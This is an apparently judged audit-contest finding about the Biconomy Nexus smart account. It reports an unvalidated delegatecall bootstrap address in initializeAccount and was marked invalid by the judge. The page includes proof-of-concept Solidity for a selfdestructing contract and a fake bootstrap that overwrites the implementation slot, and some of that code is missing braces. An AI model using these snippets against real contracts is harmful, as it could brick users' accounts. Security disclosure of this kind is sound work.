Biconomy: Nexus

Biconomy

HardhatFoundry

30,000 USDC

View results

Previous Next

Submission Details

Severity: low

Invalid

The Nexus account storage could be changed maliciously because of delegatecall and arbitrary bootstrap address in `initializeAccount`

zhuying

Summary

The Nexus account storage could be changed maliciously because of delegatecall and arbitrary bootstrap address in initializeAccount

Vulnerability Details

function initializeAccount(bytes calldata initData) external payable virtual {

_initModuleManager();

(address bootstrap, bytes memory bootstrapCall) = abi.decode(initData, (address, bytes));

(bool success, ) = bootstrap.delegatecall(bootstrapCall); // @audit-issue bootstrap address can be arbitrary address

require(success, NexusInitializationFailed());

}

initializeAccount function in Nexus.sol doesn't validate the bootstrap address, so it can be arbitrary address.
And factory contracts including NexusAccountFactory.sol and RegistryFactory.sol don't validate whether the initData includes a valid bootstrap address.
So attacker can deploy a useless Nexus account in following way:

1 deploy a contract using the code below. Assume the address is 0x123.

contract Destructor {

fallback() external {

selfdestruct(payable(0));

}

2 deploy a fake bootstrap address using the code below.

contract LogicUpgrader {

// ERC1967 implementation slot

bytes32 private constant IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

// Function to upgrade the logic contract

function upgradeTo(address newImplementation) external {

assembly {

// Store the new implementation address

sstore(IMPLEMENTATION_SLOT, newImplementation)

sstore(address(), newImplementation)

}

function getInitData() external view returns (bytes memory init) {

init = abi.encode(address(this), abi.encodeCall(this.upgradeTo, 0x123)); // 0x123 is deployed in step 1

}

3 deploy a Nexus account by calling createAccount in NexusAccountFactory.sol. initData is set as data which is got from getInitDatain step 2 contract. salt could be any value.
4 Get a useless Nexus account because implementation is 0x123.
There are also other ways to broke the newly deployed Nexus account, for example change other storage in Nexus account by delegatecall and arbitrary bootstrap address in initializeAccount.

Impact

Using malicious initData could get a useless Nexus account.

Tools Used

manual

Recommendations

In NexusAccountFactory.sol and RegistryFactory.sol validate the bootstrap address properly. Maybe consider ways in K1ValidatorFactory.sol.

Updates

Lead Judging Commences

0xnevi Lead Judge 10 months ago

Submission Judgement Published

Invalidated

Reason: Other

Assigned finding tags:

finding-front-running-initializeAccount

Invalid, - Checked [here](https://github.com/rhinestonewtf/sentinellist/blob/6dff696f39fb55bfdde9581544d788932f145e47/src/SentinelList.sol#L30-L32) based on `SentinelListLib` used as dependencies as seen [here](https://github.com/Cyfrin/2024-07-biconomy/blob/9590f25cd63f7ad2c54feb618036984774f3879d/contracts/interfaces/base/IStorage.sol#L34-L35). Contract cannot be reinitialized - front-running initializers invalid per [codehawks guidelines](https://docs.codehawks.com/hawks-auditors/how-to-determine-a-finding-validity#findings-that-may-be-invalid)

Prize pool breakdown

Total prize

30,000 USDC

nSLOC

1,433

21 USDC / LOC

High Medium

25,000 USDC

Low

2,750 USDC

Judges

2,250 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.